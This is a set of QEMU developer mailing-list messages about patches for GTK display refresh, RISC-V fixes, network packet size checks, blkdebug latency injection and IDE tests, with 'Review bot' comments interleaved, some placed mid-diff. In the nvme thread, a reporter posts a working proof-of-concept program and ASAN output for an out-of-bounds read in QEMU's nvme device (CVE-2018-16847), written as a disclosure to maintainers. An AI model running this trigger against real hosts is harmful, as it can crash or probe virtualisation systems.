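Review bot: Writing AF_UNIX into `s->dgram_dst.sin_family` reuses a `struct sockaddr_in` as a mode flag; any other path that hands dgram_dst to sendto() (the multicast branch above fills it as a real address) would then pass the kernel an AF_UNIX address with sockaddr_in length and a garbage path, and the `!= AF_UNIX` test in the send path has to be remembered wherever dgram_dst is touched. A dedicated flag in NetSocketState, e.g. `s->is_unix_dgram = sa_type == SOCKET_ADDRESS_TYPE_UNIX;`, tested in net_socket_receive_dgram, would be clearer and cannot leak into a sendto() call. The socket_local_address() failure path returning NULL with errp set looks right. net_socket_fd_init_dgram continues past the end of this hunk.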




Re: [Qemu-devel] [PATCH] gtk: sync guest display updates to host display refresh

2018-11-13 Thread Chen Zhang via Qemu-devel
Hi,

I have briefly tested this patch. Unfortunately, it apparently caused 
deteriorated performance on a previously working Windows 10 guest with DMA Buf.

The patched qemu not only clogged up graphics drawing, but also obstructed the 
guest OS. The boot time and latency for guest operations (e.g. clicking Start 
menu in guest) dramatically increased. My best guess would be that GTK update 
events interfered with some polling in main_loop_wait(false), leading to blocked 
IO, or conversely the GUI being blocked by IO.

Best regards,

--
P.S:

The arguments for qemu:

/tmp/qemu-system-x86_64 -nodefaults -machine 
pc,accel=kvm,usb=off,kernel_irqchip=on \
  -vga none -display gtk,gl=on  -rtc base=localtime \
  -device 
vfio-pci,sysfsdev=/sys/bus/pci/devices/:00:02.0/{UUID-FOR-MDEV},x-igd-opregion=on,display=on,rombar=0
 \
  -m 3000 -realtime mlock=off -smp 3,sockets=1,cores=1 \
  -drive file=/home/user/disk.img,format=qcow2,media=disk,if=ide \
  -usb -device qemu-xhci,id=xhci -device usb-tablet,bus=xhci.0 \
  -cpu host -monitor stdio

The host runs a Ubuntu 18.04 desktop.

> On Nov 13, 2018, at 5:02 PM, Gerd Hoffmann  wrote:
> 
> Reduce console refresh timer to idle refresh rate.  Register a frame
> tick callback (called by gtk on each display frame) and use that to kick
> display updates instead.
> 
> That should sync qemu refresh rate to display refresh rate.  It'll also
> stop updating the qemu display in case the qemu is not visible (gtk
> stops calling the frame tick callback then).
> 
> Buglink: https://bugs.launchpad.net/bugs/1802915
> Suggested-by: Chen Zhang 
> Signed-off-by: Gerd Hoffmann 
> ---
> ui/gtk.c | 16 
> 1 file changed, 16 insertions(+)
> 
> diff --git a/ui/gtk.c b/ui/gtk.c
> index 579990b865..8f79dfe42c 100644
> --- a/ui/gtk.c
> +++ b/ui/gtk.c
> @@ -1661,6 +1661,16 @@ static gboolean gd_configure(GtkWidget *widget,
> return FALSE;
> }
> 
> +static gboolean gd_frame_tick(GtkWidget *widget,
> +  GdkFrameClock *frame_clock,
> +  gpointer opaque)
> +{
> +VirtualConsole *vc = opaque;
> +
> +vc->gfx.dcl.ops->dpy_refresh(>gfx.dcl);
> +return G_SOURCE_CONTINUE;
> +}
> +
> /** Virtual Console Callbacks **/
> 
> static GSList *gd_vc_menu_init(GtkDisplayState *s, VirtualConsole *vc,
> @@ -1911,6 +1921,12 @@ static void gd_connect_vc_gfx_signals(VirtualConsole 
> *vc)
>  G_CALLBACK(gd_focus_out_event), vc);
> g_signal_connect(vc->gfx.drawing_area, "configure-event",
>  G_CALLBACK(gd_configure), vc);
> +if (1 /* make that a config option ??? */) {
> +update_displaychangelistener(>gfx.dcl,
> + GUI_REFRESH_INTERVAL_IDLE);
> +gtk_widget_add_tick_callback(vc->gfx.drawing_area,
> + gd_frame_tick, vc, NULL);
> +}
> } else {
> g_signal_connect(vc->gfx.drawing_area, "key-press-event",
>  G_CALLBACK(gd_text_key_down), vc);
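Review bot: `if (1 /* make that a config option ??? */)` is a placeholder condition that should not land as-is; either add the option the comment asks for or drop the `if` and keep the two calls unconditional, with a comment explaining the new refresh policy: `/* Drive refreshes from GTK's frame clock; the timer only runs at the idle rate */`. The id returned by gtk_widget_add_tick_callback is discarded, so the callback can never be removed with gtk_widget_remove_tick_callback; if a VirtualConsole can be torn down while its drawing_area survives (not determinable here), the tick would call into freed state. gd_connect_vc_gfx_signals begins before this hunk and continues after it.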
> -- 
> 2.9.3
> 




Re: [Qemu-devel] [PR RFC] RISC-V Patches for 3.1-rc2

2018-11-13 Thread Michael Clark
On Wed, Nov 14, 2018 at 12:52 PM Palmer Dabbelt  wrote:

> The following changes since commit
> cb968d275c145467c8b385a3618a207ec111eab1:
>
>   Update version for v3.1.0-rc1 release (2018-11-13 18:16:14 +)
>
> are available in the Git repository at:
>
>   git://github.com/riscv/riscv-qemu.git tags/riscv-for-master-3.1-rc2
>
> for you to fetch changes up to 3502dc824a7b0218abb49f4350e80a49829748cf:
>
>   RISC-V: Respect fences for user-only emulators (2018-11-13 15:12:15
> -0800)
>
> 
> RISC-V Patches for 3.1-rc2
>
> This pull request contains four patches that aren't really related to
> each other aside from all being bug fixes that I think should go in for
> 3.1.0:
>

Here I am again. I guess it's a somewhat arbitrary set of fixes, although one
could say the same about the set of fixes in the GitHub repo.

At least you don't have review feedback asking you split a patch up to make
it easier to review, after its already been reviewed (what I would call
"make work").

No objections from me. We just have to get these patches into the other
tree which also has RISC-V bug fixes (but I don't have an opinion about
which bugs are more or less critical). There will be some minor merge
conflicts because the RISC-V tree has writable misa suppoer. I'm planning
to rebase at 3.1.0, just so we don't trample on each other. It's probably
going to be quite a lot of work to get the patches in that tree here
because my patches tend to attract a lot of pedantic feedback. i.e. !! to
normalize a scalar into a bool and ~ to broadcast bit 1 e.g. C bitwise
logic that you find frequently in spike; has to be dumbed down into macro
wrappers. Feedback. These changes to keep people happy are the reason why
we broke things for folk like changing gp$ to __globalPointer$ (in
GCC/binutils). Suddendly all earlier asm is broken because someone wants to
give feedback about how RISC-V should be; someone who does not need to bear
the burden of those changes.

Change simply because we can make you change stuff to break things for
RISC-V users because we think those changes are a good idea. Don't get me
wrong. We get good feedback (in QEMU, mostly from RIchard Henderson), but
its not always the case. VSPILL/VFILL and vaddsz sp is a good idea. I need
to find that email of Richard's on the GCC list and forward it to Krste. I
hope the feedback makes it to folk working on the Vector spec because as
far as I can tell it is a good idea.

Apologies for the cynicism. I'll get over it.

* The second half of Alistair's memory leak patch set that I missed last
>   week.
> * A fix to make fclass.d availiable only on RV64IFD systems (without
>   this it's availiable on RV32IFD systems, truncating the result).
> * A fix to make sfence.vm availiable only in priv-1.9.1, and sfence.vma
>   only availiable in priv-1.10.
> * A change to respect fences in user-mode emulators, which were
>   previously treated as NOPs.
>
> As usual, this builds and boot Linux for me.  I don't think I have
> anything else planned for 3.1.0, but I may be wrong as things are a bit
> hectic this week.
>
> 
> Alistair Francis (1):
>   hw/riscv/virt: Free the test device tree node name
>
> Bastian Koppelmann (2):
>   target/riscv: Fix FCLASS_D being treated as RV64 only
>   target/riscv: Fix sfence.vm/a both available in any priv version
>
> Palmer Dabbelt (1):
>   RISC-V: Respect fences for user-only emulators
>
>  hw/riscv/virt.c  |  1 +
>  target/riscv/translate.c | 24 
>  2 files changed, 17 insertions(+), 8 deletions(-)
>
>
>


Re: [Qemu-devel] [PULL V2 24/26] net: ignore packet size greater than INT_MAX

2018-11-13 Thread Jason Wang



On 2018/11/13 下午11:41, Dima Stepanov wrote:

Hi Jason,

I know that this patch has been already merged to stable, but i have a
question:

On Fri, Oct 19, 2018 at 11:22:23AM +0800, Jason Wang wrote:

There should not be a reason for passing a packet size greater than
INT_MAX. It's usually a hint of bug somewhere, so ignore packet size
greater than INT_MAX in qemu_deliver_packet_iov()

CC:qemu-sta...@nongnu.org
Reported-by: Daniel Shapira
Reviewed-by: Michael S. Tsirkin
Signed-off-by: Jason Wang
---
  net/net.c | 7 ++-
  1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/net/net.c b/net/net.c
index c66847e..07c194a 100644
--- a/net/net.c
+++ b/net/net.c
@@ -712,10 +712,15 @@ ssize_t qemu_deliver_packet_iov(NetClientState *sender,
  void *opaque)
  {
  NetClientState *nc = opaque;
+size_t size = iov_size(iov, iovcnt);
  int ret;
  
+if (size > INT_MAX) {

+return size;
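Review bot: The new `if (size > INT_MAX)` branch drops the packet silently, although the commit message itself calls such a size a hint of a bug somewhere else in the stack; a short comment above the return, `/* oversized iov: almost certainly a caller bug, drop rather than truncate */`, and ideally a trace point, would keep that diagnosis discoverable when it fires. The quoted hunk is cut short, so the remainder of qemu_deliver_packet_iov and the later use of `size` are not visible here.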

Is it okay that the function returns ssize_t (signed), but the type of the
size variable is size_t (unsigned)? For now the top level routine checks
the return value only for 0, but anyway we can return negative value
here instead of positive. What do you think?

Regards, Dima.



Any non zero value should be ok here. Actually I think because of the 
conversion from size_t to ssize_t, caller actually see negative value?


Thanks




Re: [Qemu-devel] [PULL 4/4] RISC-V: Respect fences for user-only emulators

2018-11-13 Thread Michael Clark
Nits. Please improve your commit message to make them more impersonal...

On Wed, Nov 14, 2018 at 12:52 PM Palmer Dabbelt  wrote:

> Our current fence implementation ignores fences for the user-only
> configurations.  This is incorrect but unlikely to manifest: it requires
> multi-threaded user-only code that takes advantage of the weakness in
> the host's memory model and can be inlined by TCG.
>

The RISC-V fence implementation...


> This patch simply treats fences the same way for all our emulators.
> I've given it to testing as I don't want to construct a test that would
> actually trigger the failure.
>

Testing has been limited to... ? Reproducer?


> Our fence implementation has an additional deficiency where we map all
> RISC-V fences to full fences.  Now that we have a formal memory model
> for RISC-V we can start to take advantage of the strength bits on our
> fence instructions.  This requires a bit more though, so I'm going to
> split it out because the implementation is still correct without taking
> advantage of these weaker fences.
>

The fence implementation...

A formal memory model for RISC-V allows...


> Thanks to Richard Henderson for pointing out both of the issues.
>
> Signed-off-by: Palmer Dabbelt 
> Reviewed-by: Alistair Francis 
> Reviewed-by: Richard Henderson 


Assuming you fix up the commit message. I am not sure if I am present in
any of the commit messages I wrote, however perhaps thats just a matter
style with respect to writing (or re-writing) history.

Reviewed-by: Michael Clark 

---
>  target/riscv/translate.c | 2 --
>  1 file changed, 2 deletions(-)
>
> diff --git a/target/riscv/translate.c b/target/riscv/translate.c
> index f44eb9c41b48..312bf298b3c2 100644
> --- a/target/riscv/translate.c
> +++ b/target/riscv/translate.c
> @@ -1776,7 +1776,6 @@ static void decode_RV32_64G(CPURISCVState *env,
> DisasContext *ctx)
>   GET_RM(ctx->opcode));
>  break;
>  case OPC_RISC_FENCE:
> -#ifndef CONFIG_USER_ONLY
>  if (ctx->opcode & 0x1000) {
>  /* FENCE_I is a no-op in QEMU,
>   * however we need to end the translation block */
> @@ -1787,7 +1786,6 @@ static void decode_RV32_64G(CPURISCVState *env,
> DisasContext *ctx)
>  /* FENCE is a full memory barrier. */
>  tcg_gen_mb(TCG_MO_ALL | TCG_BAR_SC);
>  }
> -#endif
>  break;
>  case OPC_RISC_SYSTEM:
>  gen_system(env, ctx, MASK_OP_SYSTEM(ctx->opcode), rd, rs1,
> --
> 2.18.1
>
>
>


Re: [Qemu-devel] [PATCH] nvme: fix oob access issue(CVE-2018-16847)

2018-11-13 Thread Li Qiang
Paolo Bonzini  于2018年11月14日周三 上午2:27写道:

> On 13/11/2018 11:17, Kevin Wolf wrote:
> > Am 13.11.2018 um 02:45 hat Li Qiang geschrieben:
> >> Ping what't the status of this patch.
> >>
> >> I see Kevin's new pr doesn't contain this patch.
> >
> > Oh, I thought you said that you wanted to fix this at a higher level so
> > that the problem is caught before even getting into nvme code? If you
> > don't, I can apply the patch for my next pull request.
>
> As far as I know the bug doesn't exist.  Li Qiang, if you have a
> reproducer please send it.
>
>
Hello Paolo,
Though I've already sent the debug information and ASAN output to
secal...@redhat.com, I'm glad to provide it here as well.
This covers the read path. I believe the write path has the same problem, but
since the PoC runs in userspace, mmap can only map the exact size of the MMIO
region, so from there we can only write within the BAR. A kernel module could
issue the write past the end of the MMIO region, I think.
The nvme device's parameter should set as 'cmb_size_mb=2' and the PCI
address may differ in your system.

Thanks,
Li Qiang

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>

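int main(int argc, char **argv)
{
    /*
     * sysfs path of the nvme controller's BAR2 (the CMB).  The PCI
     * address depends on the guest's device layout (the thread notes it
     * may differ per system), so allow it to be overridden on the command
     * line instead of editing the source.  Mapping a BAR through sysfs
     * normally requires root.
     */
    const char *filename = argc > 1 ? argv[1]
                                    : "/sys/bus/pci/devices/0000:00:04.0/resource2";
    /* Must match the CMB size the device was started with (cmb_size_mb=2). */
    const size_t size = 2 * 1024 * 1024;
    volatile uint8_t *mmio = NULL;

    int fd = open(filename, O_RDWR);
    if (fd < 0) {
        printf("open file error\n");
        exit(1);
    }

    mmio = mmap(NULL, size, PROT_WRITE | PROT_READ, MAP_SHARED, fd, 0);
    if (mmio == MAP_FAILED) {
        printf("mmap error\n");
        close(fd);
        exit(1);
    }

    /*
     * The trigger: an 8-byte load whose first byte is the last byte of the
     * BAR, so the access extends past the end of the CMB region.  The
     * access is volatile so an optimizing build cannot discard the load
     * (the original stored it into an unused local, which the compiler is
     * free to elide, silently defeating the PoC).  The bytes beyond the BAR
     * also lie outside this mapping, so the guest may fault once the MMIO
     * read has been forwarded to the device model.
     */
    uint64_t val = *(volatile uint64_t *)(mmio + size - 1);
    (void)val;

    munmap((void *)mmio, size);
    close(fd);
    return 0;
}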

read:

[Switching to Thread 0x7fffc7326700 (LWP 52799)]

Thread 4 "qemu-system-x86" hit Breakpoint 1, nvme_cmb_read
(opaque=0x624b8100, addr=2097151, size=2) at hw/block/nvme.c:1182
1182 {
(gdb) p /x addr
$1 = 0x1f
(gdb) p /x addr+size
$2 = 0x21
(gdb) c
Continuing.
=
[Thread 0x7fff77efd700 (LWP 54057) exited]
==52793==ERROR: AddressSanitizer: heap-buffer-overflow on address
0x7fff817ff800 at pc 0x76e9af7f bp 0x7fffc7322fc0 sp 0x7fffc7322770
READ of size 2 at 0x7fff817ff800 thread T3
[Thread 0x7fff7a183700 (LWP 53957) exited]
[Thread 0x7fff786fe700 (LWP 53953) exited]
[Thread 0x7fff70b21700 (LWP 53952) exited]
#0 0x76e9af7e  (/usr/lib/x86_64-linux-gnu/libasan.so.3+0x5cf7e)
#1 0x562193b3 in nvme_cmb_read hw/block/nvme.c:1186
#2 0x55d630d0 in memory_region_read_accessor
/home/liqiang02/qemu-upstream/qemu/memory.c:440
#3 0x55d638da in access_with_adjusted_size
/home/liqiang02/qemu-upstream/qemu/memory.c:570
#4 0x55d690fd in memory_region_dispatch_read1
/home/liqiang02/qemu-upstream/qemu/memory.c:1375
#5 0x55d692b5 in memory_region_dispatch_read
/home/liqiang02/qemu-upstream/qemu/memory.c:1404
#6 0x55ca765b in flatview_read_continue
/home/liqiang02/qemu-upstream/qemu/exec.c:3294
#7 0x55ca790d in flatview_read
/home/liqiang02/qemu-upstream/qemu/exec.c:3332
#8 0x55ca79d3 in address_space_read_full
/home/liqiang02/qemu-upstream/qemu/exec.c:3345
#9 0x55ca7aaa in address_space_rw
/home/liqiang02/qemu-upstream/qemu/exec.c:3375
#10 0x55daadd9 in kvm_cpu_exec
/home/liqiang02/qemu-upstream/qemu/accel/kvm/kvm-all.c:2031
#11 0x55d2b2e5 in qemu_kvm_cpu_thread_fn
/home/liqiang02/qemu-upstream/qemu/cpus.c:1277
#12 0x56a037a0 in qemu_thread_start util/qemu-thread-posix.c:498
#13 0x7fffdadbd493 in start_thread
(/lib/x86_64-linux-gnu/libpthread.so.0+0x7493)
#14 0x7fffdaafface in __clone (/lib/x86_64-linux-gnu/libc.so.6+0xe8ace)




> Prasad, please revoke the CVE.
>
> Paolo
>
>


Re: [Qemu-devel] [PATCH for-4.0 00/17] tcg: Move softmmu out-of-line

2018-11-13 Thread Emilio G. Cota
On Mon, Nov 12, 2018 at 22:44:46 +0100, Richard Henderson wrote:
> Based on an idea forwarded by Emilio, which suggests a 5-6%
> speed gain is possible.  I have not spent too much time
> measuring this, as the code size gains are significant.

Nice!

> I believe that I posted an x86_64-only patch some time ago,
> but this now includes i386, aarch64 and arm32.  In late
> testing I do some failures on i386, for sparc guest.  I'll
> follow up on that later.

The following might be related: I'm seeing segfaults with -smp 8
and beyond when doing bootup+shutdown of an aarch64 guest on
an x86-64 host. smp -1 is stable AFAICT. The first commit that
shows these crashes is "tcg/i386: Use TCG_TARGET_NEED_LDST_OOL_LABELS",
that is f7ec49a51c8 in your tcg-tlb-x86 github branch.

Thanks,

Emilio



Re: [Qemu-devel] [Bug 1802150] Re: Guest undefined when destroyed on host after migration

2018-11-13 Thread Dan Midthun
The logs for the VM that gets undefined are no longer available.


Thanks,
   Dan


On 11/12/2018 01:26 PM, Dr. David Alan Gilbert wrote:
> Also, can you please include the libvirt logs for the VM, they're
> typically in /var/log/libvirt/VMNAME.log
>

https://bugs.launchpad.net/bugs/1802150

Title:
  Guest undefined when destroyed on host after migration

Status in QEMU:
  Incomplete

Bug description:
  After a live migration, guest VMs are being undefined from the host
  they were migrated to after shutdown. I have experienced this at two
  (2) separate locations on more than one hardware configuration.  This
  happens when utilizing virt-manager to view current allocations on
  hosts, and virsh on the CLI to migrate guests.  When the guest is
  migrated from one host to another, no errors are thrown, and only lose
  1 packet from infinite ping. Shutting guest down *from* the guest OS
  results in the Guest VM being undefined on the residing host, and XML
  config lost.  If needed, I can provide a recorded session of this
  happening.

  Thanks,
Dan




Re: [Qemu-devel] [PATCH] tests/ide: Free pcibus when finishing a test

2018-11-13 Thread John Snow



On 11/13/18 10:11 AM, Thomas Huth wrote:
> Once a test has finished, the pcibus structure should be freed, to
> avoid leaking memory and to make sure that the structure is properly
> re-initialized when the next test starts.
> 
> Signed-off-by: Thomas Huth 
> ---
>  tests/ide-test.c | 4 
>  1 file changed, 4 insertions(+)
> 
> diff --git a/tests/ide-test.c b/tests/ide-test.c
> index 33cef61..f0280e6 100644
> --- a/tests/ide-test.c
> +++ b/tests/ide-test.c
> @@ -142,6 +142,10 @@ static void ide_test_start(const char *cmdline_fmt, ...)
>  
>  static void ide_test_quit(void)
>  {
> +if (pcibus) {
> +qpci_free_pc(pcibus);
> +pcibus = NULL;
> +}
>  pc_alloc_uninit(guest_malloc);
>  guest_malloc = NULL;
>  qtest_end();
> 

Reviewed-by: John Snow 

Thanks; I have nothing else queued at the moment, someone else can take
this for now if convenient -- or if I'm being too lazy, let me know and
I'll stage this.

Thanks.



Re: [Qemu-devel] [PATCH] Fix for crashes and non-responsive UI on macOS Mojave

2018-11-13 Thread Programmingkid


> On Nov 11, 2018, at 4:35 PM, qemu-devel-requ...@nongnu.org wrote:
> 
> It seems that Cocoa checks are stricter on Mojave and some callbacks that 
> worked from non-GUI thread on High Sierra are no longer working.
> 
> The fixes included here are:
> 
> * Deferring qemu_main() to another thread so that the actual main thread is 
> reserved for the Cocoa UI; it also removes blocking from 
> applicationDidFinishLoading: delegate. I beleive this alone caused complete 
> UI blockage on Mojave.
> * Deferring UI-related updates in callbacks to the UI thread using 
> invokeOnMainThread helper function. This function uses DDInvocationGrabber 
> object courtesy of Dave Dribin, licensed under MIT license.
> Here?s relevant blog post for his code: 
> https://www.dribin.org/dave/blog/archives/2008/05/22/invoke_on_main_thread/
> 
> NSInvocation is used here instead of plain 
> performSelectorOnMainThread:withObject:waitUntilDone: because we want to be 
> able to pass non-id types to the handlers.

Also I realized that the only way we could call cocoa_refresh() from 
performSelectorOnMainThread:withObject:waitUntilDone: would be to add it to a 
class. 

> These changes ought to work on OS X 10.6, although I don't have a machine 
> handy to test it.
> 
> Fixes https://bugs.launchpad.net/qemu/+bug/1802684
> 
> From 8f86e30f3710d782d78dccdbe7a1564ae79220c7 Mon Sep 17 00:00:00 2001
> From: Berkus Decker 
> Date: Sun, 11 Nov 2018 21:58:17 +0200
> Subject: [PATCH 1/2] ui/cocoa: Defer qemu to another thread, leaving main
> thread for the UI



I tried both patch 1 and 2 together on Mac OS 10.12. Both qemu-system-i386 and 
qemu-system-ppc do not load their BIOS files. All I see is a black window each 
time. There is no indication of anything loading. The Machine menu doesn't 
populate with devices. Sorry. 





Re: [Qemu-devel] [Bug 1802150] Re: Guest undefined when destroyed on host after migration

2018-11-13 Thread Dan Midthun
This was done with virsh on the cli - not through virt-manager. Virt 
manager was only used to see the visual residence of the vm. The exact 
command is below:


virsh migrate 79fdd9dd-068b-41cc-b97b-d0f9d8e9df84 --desturi 
qemu+ssh://kvmadmin@192.168.0.84/system

after migrating, shutting down the guest vm results in destruction of vm 
(undefined)


Thanks,
   Dan


On 11/07/2018 02:33 PM, Thomas Huth wrote:
> This is the QEMU bug tracker here ... Can you also reproduce such an
> issue with plain QEMU? If not, could you please report this to the virt-
> manager project first? See https://virt-manager.org/bugs/#report for
> details.
>
> ** Changed in: qemu
> Status: New => Incomplete
>

https://bugs.launchpad.net/bugs/1802150

Title:
  Guest undefined when destroyed on host after migration

Status in QEMU:
  Incomplete

Bug description:
  After a live migration, guest VMs are being undefined from the host
  they were migrated to after shutdown. I have experienced this at two
  (2) separate locations on more than one hardware configuration.  This
  happens when utilizing virt-manager to view current allocations on
  hosts, and virsh on the CLI to migrate guests.  When the guest is
  migrated from one host to another, no errors are thrown, and only lose
  1 packet from infinite ping. Shutting guest down *from* the guest OS
  results in the Guest VM being undefined on the residing host, and XML
  config lost.  If needed, I can provide a recorded session of this
  happening.

  Thanks,
Dan




Re: [Qemu-devel] [PATCH] slirp: add tftp tracing

2018-11-13 Thread Samuel Thibault
Gerd Hoffmann, le mar. 13 nov. 2018 08:03:20 +0100, a ecrit:
> Useful when debugging pxeboot, to see what the guest tries to do.

Applied to my tree, thanks!

Samuel



Re: [Qemu-devel] [PATCH for-3.2 3/7] ahci-test: Drop dependence on global_qtest

2018-11-13 Thread John Snow



On 11/12/18 2:08 PM, Thomas Huth wrote:
> From: Eric Blake 
> 
> Managing parallel connections to two different monitors via
> the implicit global_qtest makes it hard to copy-and-paste code
> to tests that are not aware of the implicit state; the
> management of global_qtest is even harder to follow because
> it was masked behind set_context().
> 
> Instead, explicitly pass QTestState* around (generally, by
> reusing the member already present in ahci->parent QOSState),
> and call explicit qtest_* functions on all places that
> interact with a monitor.
> 
> We can assert that the conversion is correct by checking that
> global_qtest remains NULL throughout the test (a later patch
> that changes global_qtest to not be a public global variable
> will drop the assertions).
> 
> Bonus: there was one spot that was creating a needless temporary
> variable to execute the 'cont' command, rather than just directly
> passing the literal command through qtest_qmp().  Fixing that
> gets us one step closer to enabling -Wformat checking on
> constructed JSON.
> 
> Signed-off-by: Eric Blake 
> [thuth: rebased patch to current master branch]
> Signed-off-by: Thomas Huth 

This one's from a while back!

Acked-by: John Snow 



Re: [Qemu-devel] [PATCH v3 3/3] blkdebug: Add latency injection rule type

2018-11-13 Thread John Snow



On 11/12/18 2:06 AM, Marc Olson via Qemu-devel wrote:
> Add a new rule type for blkdebug that instead of returning an error, can
> inject latency to an IO.
> 
> Signed-off-by: Marc Olson 
> ---
>  block/blkdebug.c   | 79 
> +++---
>  docs/devel/blkdebug.txt| 35 ++--
>  qapi/block-core.json   | 31 ++
>  tests/qemu-iotests/071 | 63 
>  tests/qemu-iotests/071.out | 31 ++
>  5 files changed, 226 insertions(+), 13 deletions(-)
> 
> diff --git a/block/blkdebug.c b/block/blkdebug.c
> index 7739849..6b1f2d6 100644
> --- a/block/blkdebug.c
> +++ b/block/blkdebug.c
> @@ -65,6 +65,7 @@ typedef struct BlkdebugSuspendedReq {
>  
>  enum {
>  ACTION_INJECT_ERROR,
> +ACTION_INJECT_DELAY,
>  ACTION_SET_STATE,
>  ACTION_SUSPEND,
>  };
> @@ -81,6 +82,9 @@ typedef struct BlkdebugRule {
>  int immediately;
>  } inject_error;
>  struct {
> +int64_t latency;
> +} delay;
> +struct {
>  int new_state;
>  } set_state;
>  struct {
> @@ -123,6 +127,34 @@ static QemuOptsList inject_error_opts = {
>  },
>  };
>  
> +static QemuOptsList inject_delay_opts = {
> +.name = "inject-delay",
> +.head = QTAILQ_HEAD_INITIALIZER(inject_delay_opts.head),
> +.desc = {
> +{
> +.name = "event",
> +.type = QEMU_OPT_STRING,
> +},
> +{
> +.name = "state",
> +.type = QEMU_OPT_NUMBER,
> +},
> +{
> +.name = "latency",
> +.type = QEMU_OPT_NUMBER,
> +},
> +{
> +.name = "sector",
> +.type = QEMU_OPT_NUMBER,
> +},
> +{
> +.name = "once",
> +.type = QEMU_OPT_BOOL,
> +},
> +{ /* end of list */ }
> +},
> +};
> +

Lot of redundancy again, but ... it's just a debugging interface, so...

>  static QemuOptsList set_state_opts = {
>  .name = "set-state",
>  .head = QTAILQ_HEAD_INITIALIZER(set_state_opts.head),
> @@ -145,6 +177,7 @@ static QemuOptsList set_state_opts = {
>  
>  static QemuOptsList *config_groups[] = {
>  _error_opts,
> +_delay_opts,
>  _state_opts,
>  NULL
>  };
> @@ -194,6 +227,11 @@ static int add_rule(void *opaque, QemuOpts *opts, Error 
> **errp)
>  qemu_opt_get_bool(opts, "immediately", 0);
>  break;
>  
> +case ACTION_INJECT_DELAY:
> +rule->options.delay.latency =
> +qemu_opt_get_number(opts, "latency", 100) * SCALE_US;
> +break;
> +
>  case ACTION_SET_STATE:
>  rule->options.set_state.new_state =
>  qemu_opt_get_number(opts, "new_state", 0);
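Review bot: The user-supplied `latency` read in the new `ACTION_INJECT_DELAY` arm is multiplied by SCALE_US with no range check before being stored into the int64_t `latency` field, so a large value wraps into a negative delay; guard it before the multiplication, e.g. `uint64_t us = qemu_opt_get_number(opts, "latency", 100); if (us > INT64_MAX / SCALE_US) { error_setg(errp, "latency too large"); return the function's error value; }`, assuming qemu_opt_get_number returns uint64_t as elsewhere in QEMU. How a negative delay is later consumed is outside this hunk, as are the start and end of add_rule.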
> @@ -226,6 +264,12 @@ static void remove_rule(BlkdebugRule *rule)
>  g_free(rule);
>  }
>  
> +static void remove_active_rule(BDRVBlkdebugState *s, BlkdebugRule *rule)
> +{
> +QSIMPLEQ_REMOVE(>active_rules, rule, BlkdebugRule, active_next);
> +remove_rule(rule);
> +}
> +
>  static int read_config(BDRVBlkdebugState *s, const char *filename,
> QDict *options, Error **errp)
>  {
> @@ -264,6 +308,14 @@ static int read_config(BDRVBlkdebugState *s, const char 
> *filename,
>  goto fail;
>  }
>  
> +d.action = ACTION_INJECT_DELAY;
> +qemu_opts_foreach(_delay_opts, add_rule, , _err);
> +if (local_err) {
> +error_propagate(errp, local_err);
> +ret = -EINVAL;
> +goto fail;
> +}
> +
>  d.action = ACTION_SET_STATE;
>  qemu_opts_foreach(_state_opts, add_rule, , _err);
>  if (local_err) {
> @@ -275,6 +327,7 @@ static int read_config(BDRVBlkdebugState *s, const char 
> *filename,
>  ret = 0;
>  fail:
>  qemu_opts_reset(_error_opts);
> +qemu_opts_reset(_delay_opts);
>  qemu_opts_reset(_state_opts);
>  if (f) {
>  fclose(f);
> @@ -474,7 +527,8 @@ static int rule_check(BlockDriverState *bs, uint64_t 
> offset, uint64_t bytes)
>  {
>  BDRVBlkdebugState *s = bs->opaque;
>  BlkdebugRule *rule = NULL;
> -BlkdebugRule *error_rule = NULL;
> +BlkdebugRule *error_rule = NULL, *delay_rule = NULL;
> +int64_t latency;
>  int error;
>  bool immediately;
>  int ret = 0;
> @@ -484,20 +538,36 @@ static int rule_check(BlockDriverState *bs, uint64_t 
> offset, uint64_t bytes)
>  (bytes && rule->offset >= offset &&
>   rule->offset < offset + bytes))
>  {
> -if (rule->action == ACTION_INJECT_ERROR) {
> +if (!error_rule && rule->action == ACTION_INJECT_ERROR) {
>  error_rule = rule;
> +} else if (!delay_rule && rule->action == ACTION_INJECT_DELAY) {
> +delay_rule = rule;
> +}
> +
> +if (error_rule && delay_rule) {
>  break;
>  }
>  }
>  }
>  
> +if 

[Qemu-devel] [PULL 2/4] target/riscv: Fix FCLASS_D being treated as RV64 only

2018-11-13 Thread Palmer Dabbelt
From: Bastian Koppelmann 

Signed-off-by: Bastian Koppelmann 
Reviewed-by: Richard Henderson 
Signed-off-by: Palmer Dabbelt 
---
 target/riscv/translate.c | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/target/riscv/translate.c b/target/riscv/translate.c
index 18d7b6d1471d..5359088e24bc 100644
--- a/target/riscv/translate.c
+++ b/target/riscv/translate.c
@@ -1237,13 +1237,14 @@ static void gen_fp_arith(DisasContext *ctx, uint32_t 
opc, int rd,
 tcg_temp_free(t0);
 break;
 
-#if defined(TARGET_RISCV64)
 case OPC_RISC_FMV_X_D:
 /* also OPC_RISC_FCLASS_D */
 switch (rm) {
+#if defined(TARGET_RISCV64)
 case 0: /* FMV */
 gen_set_gpr(rd, cpu_fpr[rs1]);
 break;
+#endif
 case 1:
 t0 = tcg_temp_new();
 gen_helper_fclass_d(t0, cpu_fpr[rs1]);
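Review bot: With the `#if defined(TARGET_RISCV64)` now wrapping only the `case 0:` arm, an RV32 build silently routes rm == 0 (FMV.X.D) to the switch's default arm, which lies outside this hunk, and nothing in the code says that is intended; a one-line comment next to the `#if`, `/* FMV.X.D exists only on RV64; on RV32 rm == 0 falls to default (illegal) */`, would make the asymmetry deliberate rather than accidental. The enclosing gen_fp_arith starts and ends outside this hunk.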
@@ -1255,6 +1256,7 @@ static void gen_fp_arith(DisasContext *ctx, uint32_t opc, 
int rd,
 }
 break;
 
+#if defined(TARGET_RISCV64)
 case OPC_RISC_FMV_D_X:
 t0 = tcg_temp_new();
 gen_get_gpr(t0, rs1);
-- 
2.18.1




[Qemu-devel] [PULL 1/4] hw/riscv/virt: Free the test device tree node name

2018-11-13 Thread Palmer Dabbelt
From: Alistair Francis 

Signed-off-by: Alistair Francis 
Signed-off-by: Palmer Dabbelt 
---
 hw/riscv/virt.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/hw/riscv/virt.c b/hw/riscv/virt.c
index 4a137a503c8a..2b38f890702c 100644
--- a/hw/riscv/virt.c
+++ b/hw/riscv/virt.c
